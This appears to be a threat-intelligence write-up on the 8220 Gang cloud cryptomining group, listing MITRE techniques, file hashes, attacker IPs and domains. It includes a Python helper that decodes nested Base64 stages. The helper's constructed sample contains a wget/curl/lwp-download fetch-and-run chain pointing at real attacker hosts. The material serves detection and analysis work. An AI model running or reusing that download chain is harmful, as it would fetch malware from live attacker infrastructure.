8220 Gang is a low-skill crimeware actor known for infecting cloud hosts via SSH brute forcing and exposed services. The article walks through an educational SOC investigation of the group's infection script, payloads, and infrastructure to help analysts track the threat and understand the attackers' objectives.
Key points
- 8220 Gang targets cloud hosts by exploiting n-day vulnerabilities and using remote access brute forcing (SSH).
- Infections occur on publicly accessible cloud hosts (AWS, Azure, GCP, Aliyun, QCloud) running Docker, Confluence, WebLogic, and Redis.
- An initial discovery involved a simple infection script with a known SHA1 hash, observable via honeypots or malware feeds.
- The infection script uses multi-level Base64 encoding and downloads itself and a payload to achieve persistence (createservices function).
- lwp-download is used as a failover for wget/curl to download commands, showing standardized tool usage in the infection chain.
- Post-infection activity centers on deploying PwnRig miners and an IRC-based Tsunami bot, with infrastructure evolving across campaigns (including FBI-themed domains).
- Infrastructure tracking reveals clumsy, overlapping DNS/IP usage (e.g., 194.38.23.170, 185.106.94.146, dw.bpdeliver.ru, jira.letmaker.top, fbi.su1001-2.top) that aids attribution when combined with malware samples.
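The key points above describe a script that hides its next stage under several layers of Base64 and a download chain that falls back from wget to curl to lwp-download, and they note that the group's infrastructure is reused clumsily enough to help attribution. The following analyst helper, added here as an example and not code from the article or from 8220 Gang, peels nested `echo <b64> | base64 -d` stages, pulls every host referenced by any stage, and checks them against the IoC list on this page. The sample script it runs on is constructed for the demonstration (the file name is a placeholder); only the network indicators come from the page.

```python
import base64
import binascii
import re

# Known 8220 Gang network indicators taken from the IoC list on this page.
KNOWN_IOCS = {
    "194.38.23.170", "185.106.94.146", "79.137.203.156",
    "jira.letmaker.top", "dw.bpdeliver.ru", "fbi.su1001-2.top",
}

# Matches the `echo <base64> | base64 -d` idiom used to hide the next stage.
B64_STAGE_RE = re.compile(
    r"""echo\s+['"]?([A-Za-z0-9+/=]{16,})['"]?\s*\|\s*base64\s+(?:-d|--decode)"""
)
URL_HOST_RE = re.compile(r"(?:https?|ftp)://([A-Za-z0-9.-]+)")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def peel_base64_layers(script: str, max_depth: int = 10) -> list:
    """Return every stage of a nested-Base64 script, outermost first.

    Each stage is scanned for `echo <b64> | base64 -d`; the decoded text
    becomes a new stage. Decoding stops when no further blob is found or
    max_depth is reached (guards against a blob that decodes to itself).
    """
    layers = [script]
    frontier = [script]
    for _ in range(max_depth):
        next_frontier = []
        for text in frontier:
            for blob in B64_STAGE_RE.findall(text):
                try:
                    decoded = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
                except (binascii.Error, ValueError):
                    continue  # not valid Base64; leave it for manual review
                layers.append(decoded)
                next_frontier.append(decoded)
        if not next_frontier:
            break
        frontier = next_frontier
    return layers


def extract_hosts(layers) -> set:
    """Collect hostnames and IPv4 addresses referenced by any decoded stage."""
    hosts = set()
    for text in layers:
        hosts.update(URL_HOST_RE.findall(text))
        hosts.update(IPV4_RE.findall(text))
    return hosts


def match_known_iocs(hosts, known=KNOWN_IOCS) -> list:
    """Return the subset of extracted hosts that are already attributed."""
    return sorted(hosts & known)


# --- Constructed sample (not a real 8220 Gang script) -----------------------
# The innermost stage mimics the wget -> curl -> lwp-download failover chain
# the article describes; PLACEHOLDER.sh is not a real file name.
_INNER = (
    "wget -q http://dw.bpdeliver.ru/PLACEHOLDER.sh -O /tmp/x"
    " || curl -s http://194.38.23.170/PLACEHOLDER.sh -o /tmp/x"
    " || lwp-download http://jira.letmaker.top/PLACEHOLDER.sh /tmp/x\n"
)


def _wrap(stage: str) -> str:
    """Hide one stage behind a Base64 layer, as the infection script does."""
    return "echo " + base64.b64encode(stage.encode()).decode() + " | base64 -d | bash\n"


SAMPLE_SCRIPT = "#!/bin/sh\n" + _wrap(_wrap(_INNER))


def analyze(script: str) -> dict:
    """Decode all stages and report hosts plus those matching known IoCs."""
    layers = peel_base64_layers(script)
    hosts = extract_hosts(layers)
    return {"stages": len(layers), "hosts": hosts, "attributed": match_known_iocs(hosts)}


if __name__ == "__main__":
    report = analyze(SAMPLE_SCRIPT)
    print(f"decoded {report['stages']} stages")
    print("hosts referenced:", sorted(report["hosts"]))
    print("already attributed to 8220 Gang:", report["attributed"])
```

The decoder never executes anything it decodes; it only treats each stage as text, which is the point when triaging a downloader whose later stages are meant to run through `bash`. Hosts that do not match the known list are the ones worth pivoting on, since the article's attribution rests on overlapping DNS and IP reuse between samples.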
MITRE Techniques
- [T1110] Brute Force – “infecting cloud hosts through n-day vulnerabilities and remote access brute forcing.”
- [T1190] Exploit Public-Facing Application – “Victims using cloud infrastructure … are often infected via publicly accessible hosts running Docker, Confluence, Apache WebLogic, and Redis.”
- [T1059.004] Command and Scripting Interpreter: Unix Shell – “lwp-download” and other commands used within shell scripts to download payloads.
- [T1105] Ingress Tool Transfer – “downloading and setting persistence of some other file” and payload delivery from malicious servers.
- [T1027] Obfuscated/Compressed Files and Information – “multiple levels of Base64 encoding… hiding the fact that it is also downloading a specific payload.”
- [T1543] Create/Modify System Process – “set persistence on the victim machine by downloading itself from malicious servers.”
- [T1071.004] Application Layer Protocol: IRC – “the Tsunami sample” and IRC bot communications observed in post-infection activity.
Indicators of Compromise
- [SHA1] a9da0947243333d95f84f6a0e37b9fc29b2fb054 – 8220 Gang Install Script
- [SHA1] 472548a4b8295182f6ba8641d74725c2250b7243 – 8220 Gang Bashirc.x86_64 – Packed, old version, “Tsunami”
- [SHA1] 38be55f1fc4ce1cb5438236abc5077019e5e1cdf – 8220 Gang X86_64 – Packed miner, uses fbi.su1001-2.top
- [SHA1] 332485bd460f55117a254f8164736b90d74aa9f6 – e2c3e – Unpacked, PwnRig miner
- [IP] 194.38.23.170 – 8220 Gang Infrastructure – Shared
- [IP] 185.106.94.146 – 8220 Gang Infrastructure
- [IP] 79.137.203.156 – 8220 Gang Infrastructure
- [Domain] jira.letmaker.top – 8220 Gang Infrastructure – Reused
- [Domain] dw.bpdeliver.ru – 8220 Gang Infrastructure – Recent
- [Domain] fbi.su1001-2.top – 8220 Gang Infrastructure – Recent